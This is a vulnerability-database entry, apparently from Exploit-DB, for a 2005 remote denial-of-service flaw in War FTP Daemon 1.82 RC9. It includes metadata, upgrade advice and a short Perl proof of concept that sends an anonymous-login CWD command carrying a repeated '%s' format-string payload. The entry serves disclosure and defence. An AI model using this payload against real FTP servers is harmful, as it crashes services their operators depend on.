header-logo
Suggest Exploit
vendor:
War FTP Daemon
by:
THX 2 barabas 4 his GoldenFTP-sploit
7.5
CVSS
HIGH
Denial of Service
400
CWE
Product Name: War FTP Daemon
Affected Version From: 1.82.00-RC9
Affected Version To: Previous versions
Patch Exists: YES
Related CWE: N/A
CPE: a:jgaa:war_ftpd
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2005

War FTP Daemon Remote Denial of Service Vulnerability

War FTP Daemon is reported prone to a remote denial of service vulnerability. This issue arises because the application fails to handle exceptional conditions in a proper manner. War FTP Daemon 1.82.00-RC9 is reported prone to this issue. It is likely that previous versions are vulnerable as well.

Mitigation:

Upgrade to the latest version of War FTP Daemon
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/12384/info

War FTP Daemon is reported prone to a remote denial of service vulnerability. This issue arises because the application fails to handle exceptional conditions in a proper manner.

War FTP Daemon 1.82.00-RC9 is reported prone to this issue. It is likely that previous versions are vulnerable as well.

#!/usr/bin/perl -w
# remote DoS PoC Exploit for WarFTPD 1.82 RC9
# THX 2 barabas 4 his GoldenFTP-sploit :)
# greetings fly out to Foobar

use strict;
use Net::FTP;
my $payload="%s"x115;

my $ftp = Net::FTP->new("127.0.0.1", Debug => 1);
$ftp->login("anonymous","123@123.com");
$ftp->quot("CWD",$payload);